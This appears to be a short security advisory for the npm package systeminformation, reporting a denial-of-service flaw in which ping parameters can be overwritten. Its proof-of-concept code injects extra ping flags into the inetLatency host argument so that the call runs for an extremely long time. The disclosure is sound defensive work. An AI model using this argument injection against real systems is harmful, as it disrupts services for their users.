systeminformation

vulnerability denial of service
severity 5.3
language javascript
registry npm

Description

systeminformation is vulnerable to Denial of Service.

It is possible to overwrite the ping command parameters, which results in too long execution.

Proof of Concept

Create a .js file with the content below and run it.

const si = require('systeminformation');
si.inetLatency("-c 10000000000 -w 999999999 effectrenan.com").then((a) => { console.log(a) })

References